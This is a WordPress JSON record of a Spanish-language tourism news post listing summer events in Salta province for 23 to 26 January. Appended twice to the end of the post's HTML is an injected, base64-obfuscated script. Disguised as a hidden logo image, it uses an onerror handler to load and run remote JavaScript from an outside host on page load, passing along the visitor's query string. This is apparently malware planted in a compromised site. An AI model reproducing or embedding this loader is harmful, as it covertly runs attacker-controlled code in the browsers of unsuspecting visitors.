{"id":4760,"date":"2025-01-23T09:42:28","date_gmt":"2025-01-23T12:42:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4760"},"modified":"2025-08-13T23:42:08","modified_gmt":"2025-08-14T02:42:08","slug":"experiencias-para-vivir-el-verano-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4760","title":{"rendered":"Experiencias para vivir el verano en Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a1737ffadc307447b826e75ae1ee3175\" style=\"background-color:#034d78\"><em>La provincia ofrece importantes actividades para disfrutar en el verano. En Molinos se realizar\u00e1 la 40\u00b0 Edici\u00f3n del Festival Nacional del Poncho, de la Doma y el Folclore<\/em><\/h4>\n\n\n\n<p>Salta es una provincia en la que se disfrutan variadas propuestas, los municipios ofrecen la posibilidad de participar de ferias, festivales, concursos gastron\u00f3micos; asimismo, las propuestas incluyen senderismo, trekking, avistaje de aves, astroturismo, entre otras, pueden consultarse en calendario.turismosalta.gob.ar<\/p>\n\n\n\n<p>Adem\u00e1s, ma\u00f1ana\u00a0viernes 24 en Molinos se llevar\u00e1 a cabo la 40\u00b0 Edici\u00f3n del Festival Nacional del Poncho, de la Doma y el Folclore con una importante cartelera de artistas. \u00a0<\/p>\n\n\n\n<p>Por otra parte en&nbsp;<a href=\"http:\/\/https\/\/experiencias.turismosalta.gov.ar\/\">http:\/\/https:\/\/experiencias.turismosalta.gov.ar\/<\/a>&nbsp;se accede a diversas propuestas de experiencias de aventuras, naturaleza y gastronom\u00eda que pueden disfrutarse todo el a\u00f1o.<\/p>\n\n\n\n<p>Se ofrecen a continuaci\u00f3n diversas propuestas de los municipios desde este&nbsp;jueves 23 al domingo 26 de enero:<\/p>\n\n\n\n<p><strong>Jueves 23<\/strong><\/p>\n\n\n\n<p><strong>Met\u00e1n<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Paseo en bici por la ciudad. Salida Plaza San Mart\u00edn, llegada al balneario camping municipal<\/li>\n<\/ul>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ciclo de homenajes. M\u00fasica bajo las estrellas. Paseo de los Poetas (Alvarado 1299)<\/li>\n<\/ul>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Visitas guiadas. Museo Regional Andino. Salas de Curiosidades, geolog\u00eda, biodiversidad, arqueolog\u00eda, historia, Gobernaci\u00f3n de los Andes, territorio de los andes, miner\u00eda, Ramal C-14\u00a0<\/li>\n\n\n\n<li>Exposici\u00f3n de hierbas medicinales. Museo Regional Andino.\u00a0<\/li>\n\n\n\n<li>Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino.<\/li>\n\n\n\n<li>Avistaje de aves. Museo Regional Andino. Actividades did\u00e1cticas y recreativas, partida desde el museo por la Quebrada del B\u00faho.\u00a0<\/li>\n\n\n\n<li>Caminata por las serran\u00edas de Cobres y el Paseo de la Cruz. Museo Regional Andino. Caminata diurna para observar la localidad e interpretar en el sendero de la Cruz, las costumbres y tradiciones locales. Con turno previos.\u00a0<\/li>\n\n\n\n<li>Taller de tejido. Mercado Artesanal. Aprendizaje sobre el proceso de esquila, hilado y tejido de prendas con lana de llama. \u00a0\u00a0<\/li>\n\n\n\n<li>Taller de medicina ancestral. Mercado Artesanal.<\/li>\n<\/ul>\n\n\n\n<p>Estas actividades se realizar\u00e1n hasta el viernes 28 de febrero<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Trekking para ni\u00f1os con relatos de mitos y leyenda. Paraje Toconadito. \u00a0Ni\u00f1os de 8 a 14 hs \u00a0jueves hasta el 27 de febrero<\/li>\n<\/ul>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Pe\u00f1a andina. Plaza principal<\/li>\n<\/ul>\n\n\n\n<p><strong>Viernes 24<\/strong><\/p>\n\n\n\n<p><strong>Molinos<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Festival Nacional del Poncho, de la doma y el folclore.<\/li>\n\n\n\n<li>Feria Artesanal Sabores de mi Tierra. Peatonal Abraham Fern\u00e1ndez<\/li>\n<\/ul>\n\n\n\n<p><strong>Gral. G\u00fcemes<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>4to Concurso de la empanada salte\u00f1a (instancia municipial)<\/li>\n<\/ul>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Visitas guiadas. Museo Regional Andino. Salas de Curiosidades, geolog\u00eda, biodiversidad, arqueolog\u00eda, historia, gobernaci\u00f3n de los Andes, territorio de los andes, miner\u00eda, Ramal C-14\u00a0<\/li>\n\n\n\n<li>Exposici\u00f3n de hierbas medicinales. Museo Regional Andino.\u00a0<\/li>\n\n\n\n<li>Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino.\u00a0<\/li>\n\n\n\n<li>Avistaje de aves. Museo Regional Andino. Actividades did\u00e1cticas y recreativas, partida desde el museo por la Quebrada del B\u00faho.\u00a0<\/li>\n\n\n\n<li>Caminata por las serran\u00edas de Cobres y el Paseo de la Cruz. Museo Regional Andino. Caminata diurna para observar la localidad e interpretar en el sendero de la Cruz, las costumbres y tradiciones locales. Con turno previos. *<\/li>\n\n\n\n<li>Taller de tejido. Mercado Artesanal. Aprendizaje sobre el proceso de esquila, hilado y tejido de prendas con lana de llama.\u00a0<\/li>\n\n\n\n<li>Taller de medicina ancestral. Mercado Artesanal.\u00a0<\/li>\n\n\n\n<li>Trekking para ni\u00f1os con relatos de mitos y leyendas. Paraje Toconadito<\/li>\n<\/ul>\n\n\n\n<p>&nbsp;Estas actividades se realizar\u00e1n hasta el viernes 28 de febrero<\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ciudad de las Pe\u00f1as. Intervenci\u00f3n art\u00edstica de las distintas pe\u00f1as de la ciudad, se podr\u00e1 disfrutar de shows y ballets en vivo.<\/li>\n\n\n\n<li>Luces de Paz y bien -Mapping San Francisco. Iglesia y Museo San Francisco<\/li>\n<\/ul>\n\n\n\n<p><strong>San Lorenzo<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Aprendiendo a bailar folclore. Quebrada de San Lorenzo. Taller de danzas folcl\u00f3rica a cargo de las academias de danzas Misterio de Zamba y La Sanlorence\u00f1a<\/li>\n\n\n\n<li>Taller para ni\u00f1os \u201cConstru\u00ed tu juguete aut\u00f3mata\u201d. Parador Providencia (Castellanos)<\/li>\n<\/ul>\n\n\n\n<p><strong>El Carril<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Semana Slow Food. Presentaci\u00f3n de recetas en locales adheridos A El Carril de los Sabores<\/li>\n\n\n\n<li>Estaci\u00f3n en movimiento. En Estaci\u00f3n Facundo de Zuvir\u00eda clases de gimnasia y ritmos latinos<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15743-experiencias-para-vivir-el-verano-en-salta.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15743-experiencias-para-vivir-el-verano-en-salta.webp\" alt=\"Experiencias para vivir el verano en Salta\"\/><\/a><\/figure>\n\n\n\n<p><strong>S\u00e1bado 25<\/strong><\/p>\n\n\n\n<p><strong>Met\u00e1n<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Caminata a Balderrama. Salida desde el camping municipal<\/li>\n<\/ul>\n\n\n\n<p><strong>Payogasta<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Fiesta y concurso del queso de cabra. Paraje Las Cortaderas<\/li>\n<\/ul>\n\n\n\n<p><strong>Guachipas<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>1er concurso del bu\u00f1uelo y mate cocido. P\u00f3rtico de ingreso al pueblo<\/li>\n<\/ul>\n\n\n\n<p><strong>San Carlos<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Desentierro del carnaval. Sede Fort\u00edn San Carlos, calle San Mart\u00edn. Canto de coplas, baguales y vidalas<\/li>\n<\/ul>\n\n\n\n<p><strong>Cerrillos<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>119\u00b0 Edici\u00f3n Corso de Flores. Cors\u00f3dromo Mart\u00edn Miguel de G\u00fcemes. Patrimonio cultural de la ciudad<\/li>\n<\/ul>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Visitas guiadas. Museo Regional Andino. Salas de Curiosidades, geolog\u00eda, biodiversidad, arqueolog\u00eda, historia, gobernaci\u00f3n de los Andes, territorio de los andes, miner\u00eda, Ramal C-14\u00a0<\/li>\n\n\n\n<li>Exposici\u00f3n de hierbas medicinales. Museo Regional Andino.\u00a0<\/li>\n\n\n\n<li>Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino.\u00a0<\/li>\n\n\n\n<li>Avistaje de aves. Museo Regional Andino. Actividades did\u00e1cticas y recreativas, partida desde el museo por la Quebrada del B\u00faho.\u00a0<\/li>\n\n\n\n<li>Caminata por las serran\u00edas de Cobres y el Paseo de la Cruz. Museo Regional Andino. Caminata diurna para observar la localidad e interpretar en el sendero de la Cruz, las costumbres y tradiciones locales. Con turno previos.\u00a0<\/li>\n\n\n\n<li>Taller de tejido. Mercado Artesanal. Aprendizaje sobre el proceso de esquila, hilado y tejido de prendas con lana de llama.\u00a0<\/li>\n\n\n\n<li>Taller de medicina ancestral. Mercado Artesanal.\u00a0<\/li>\n<\/ul>\n\n\n\n<p>Estas actividades se realizar\u00e1n hasta el viernes 28 de febrero<\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ferias Artesanales. Paseo de los Poetas (Esteco y Alvarado), Plaza G\u00fcemes (Balcarce y Leguizam\u00f3n), Paseo Balcarce (Balcarce al 700)<\/li>\n\n\n\n<li>Festejo del A\u00f1o Nuevo Chino. Museo de la Ciudad. Casa Hern\u00e1ndez (La Florida 97)<\/li>\n\n\n\n<li>Cambio de Guardia. Cabildo Hist\u00f3rico (Caseros 549)<\/li>\n<\/ul>\n\n\n\n<p><strong>Vaqueros<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Taller gastron\u00f3mico \u201cAprendiendo a hacer empanadas\u201d, actividad con la ganadora del concurso<\/li>\n<\/ul>\n\n\n\n<p><strong>San Lorenzo<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Feria gastron\u00f3mica El Zorzal. Plaza Ej\u00e9rcito Argentino<\/li>\n\n\n\n<li>Salidas guiadas para ni\u00f1os con avistamiento de aves. Reserva municipal Las Yungas<\/li>\n\n\n\n<li>Taller de Iniciaci\u00f3n al Senderismo. Reserva municipal Las Yungas<\/li>\n<\/ul>\n\n\n\n<p><strong>Seclant\u00e1s<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Feria Gastron\u00f3mica Con sabor a historia. La Puerta. Valle de Luracatao<\/li>\n<\/ul>\n\n\n\n<p><strong>Or\u00e1n<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Corsos Color. Parque de la Familia. Desfiles de comparsas aut\u00f3ctonas, gorros gigantes, tinkus, pim pim, baile de agrupaciones tropicales y comparsas art\u00edsticas<\/li>\n<\/ul>\n\n\n\n<p><strong>El Carril<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Humor en la Estaci\u00f3n Facundo de Zuvir\u00eda<\/li>\n\n\n\n<li>Semana Slow Food. Presentaci\u00f3n de recetas. Locales adheridos a El Carril de los Sabores<\/li>\n<\/ul>\n\n\n\n<p><strong>El Galp\u00f3n<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Concurso de la tortilla a la parrilla. Camping municipal r\u00edo Juramento<\/li>\n<\/ul>\n\n\n\n<p><strong>Domingo 26<\/strong><\/p>\n\n\n\n<p><strong>Met\u00e1n<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Noche de karaoke. Plaza San Mart\u00edn<\/li>\n<\/ul>\n\n\n\n<p><strong>Chicoana<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>XII\u00ba Encuentro y ronda de bandone\u00f3n y copleros. Predio Municipal Los Eucaliptus<\/li>\n<\/ul>\n\n\n\n<p><strong>El Carril<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Humor en la estaci\u00f3n. Estaci\u00f3n Facundo de Zuvir\u00eda<\/li>\n<\/ul>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Visitas guiadas. Museo Regional Andino. Salas de Curiosidades, geolog\u00eda, biodiversidad, arqueolog\u00eda, historia, gobernaci\u00f3n de los Andes, territorio de los andes, miner\u00eda, Ramal C-14\u00a0<\/li>\n\n\n\n<li>Exposici\u00f3n de hierbas medicinales. Museo Regional Andino.\u00a0<\/li>\n\n\n\n<li>Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino.<\/li>\n\n\n\n<li>Avistaje de aves. Museo Regional Andino. Actividades did\u00e1cticas y recreativas, partida desde el museo por la Quebrada del B\u00faho.<\/li>\n\n\n\n<li>Caminata por las serran\u00edas de Cobres y el Paseo de la Cruz. Museo Regional Andino. Caminata diurna para observar la localidad e interpretar en el sendero de la Cruz, las costumbres y tradiciones locales. Con turno previos.\u00a0<\/li>\n\n\n\n<li>Taller de tejido. Mercado Artesanal. Aprendizaje sobre el proceso de esquila, hilado y tejido de prendas con lana de llama.<\/li>\n\n\n\n<li>Taller de medicina ancestral. Mercado Artesanal.<\/li>\n<\/ul>\n\n\n\n<p>Estas actividades se realizar\u00e1n hasta el viernes 28 de febrero<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Trekking para ni\u00f1os con relatos de mitos y leyendas. Paraje Toconadito. Hasta el 27 de febrero<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La provincia ofrece importantes actividades para disfrutar en el verano. En Molinos se realizar\u00e1 la 40\u00b0 Edici\u00f3n del Festival Nacional del Poncho, de la Doma y el Folclore Salta es una provincia en la que se disfrutan variadas propuestas, los municipios ofrecen la posibilidad de participar de ferias, festivales, concursos gastron\u00f3micos; asimismo, las propuestas incluyen [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4761,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-4760","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4760"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4760"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4760\/revisions"}],"predecessor-version":[{"id":6591,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4760\/revisions\/6591"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4761"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4760"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4760"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4760"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}